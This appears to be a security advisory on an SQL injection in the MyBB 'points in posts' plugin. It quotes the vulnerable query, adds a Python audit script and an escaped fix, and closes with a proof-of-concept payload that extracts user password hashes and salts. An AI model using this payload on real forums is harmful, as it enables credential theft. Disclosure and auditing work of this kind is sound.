MyBB Plugin points in posts <= 1.7 SQL injection


# Version: 1.7

Introduction
------------

Give the user points and posts, Store points, automatic Achievements

SQL injection
-------------

pointshop.php L.95

if($mybb->input['action'] == "do_donate" && $mybb->request_method == "post")
{
        verify_post_check($mybb->input['my_post_key']);
        // The user-supplied username is interpolated into the query without escaping
        $queryrec = $db->query("SELECT * FROM ".TABLE_PREFIX."users WHERE username='{$mybb->input['username']}'");
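
The same pattern can be audited for across a plugin's PHP files. The following is an added example, not code from the plugin or from MyBB: a line-based check that flags calls on MyBB's `$db` object that embed `$mybb->input[...]` without `$db->escape_string()` or an integer cast. The function name `find_unescaped_input` is hypothetical, and the hardened lines in the sample are constructed for illustration.

```python
import re

# Calls on MyBB's $db object that take raw SQL or a raw WHERE clause.
DB_CALL = re.compile(r"\$db->(query|write_query|simple_select)\s*\(")
# Any direct read of request input.
RAW_INPUT = re.compile(r"\$mybb->input\[\s*['\"](\w+)['\"]\s*\]")
# Wrappers that neutralise the value before it reaches the SQL string.
SAFE_WRAP = re.compile(
    r"(\$db->escape_string|intval)\s*\(\s*\$mybb->input\[[^\]]*\]\s*\)"
    r"|\(int\)\s*\$mybb->input\[[^\]]*\]"
)

def find_unescaped_input(php_source):
    """Return (line_no, parameter, line) for DB calls embedding raw input."""
    findings = []
    for no, line in enumerate(php_source.splitlines(), 1):
        if not DB_CALL.search(line):
            continue
        # Drop wrapped uses first; any input read left over is unsanitised.
        remaining = SAFE_WRAP.sub("", line)
        for m in RAW_INPUT.finditer(remaining):
            findings.append((no, m.group(1), line.strip()))
    return findings

# Constructed sample: the excerpt quoted above, followed by a hardened
# variant (assumed fix) and an integer-cast lookup that should not be flagged.
SAMPLE = r'''
if($mybb->input['action'] == "do_donate" && $mybb->request_method == "post")
{
    verify_post_check($mybb->input['my_post_key']);
    $queryrec = $db->query("SELECT * FROM ".TABLE_PREFIX."users WHERE username='{$mybb->input['username']}'");
    // hardened form (constructed): escape before building the query
    $username = $db->escape_string($mybb->input['username']);
    $queryrec = $db->query("SELECT * FROM ".TABLE_PREFIX."users WHERE username='{$username}'");
    $uid = $db->simple_select("users", "uid", "uid=".(int)$mybb->input['uid']);
}
'''

if __name__ == "__main__":
    for no, param, line in find_unescaped_input(SAMPLE):
        print(f"line {no}: unescaped input '{param}' in: {line}")
```

The check is a heuristic: it misses queries split across several lines and input copied into a variable before use, so a clean result does not replace manual review.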

Proof of concept
----------------

Go to http://pentest.lan/mybb/pointshop.php?action=donate
and set the username to: user' and (select 1 from(select count(*),concat((select concat(username, 0x3a, password, 0x3a, salt, 0x3a) from mybb_users limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -

Groucho

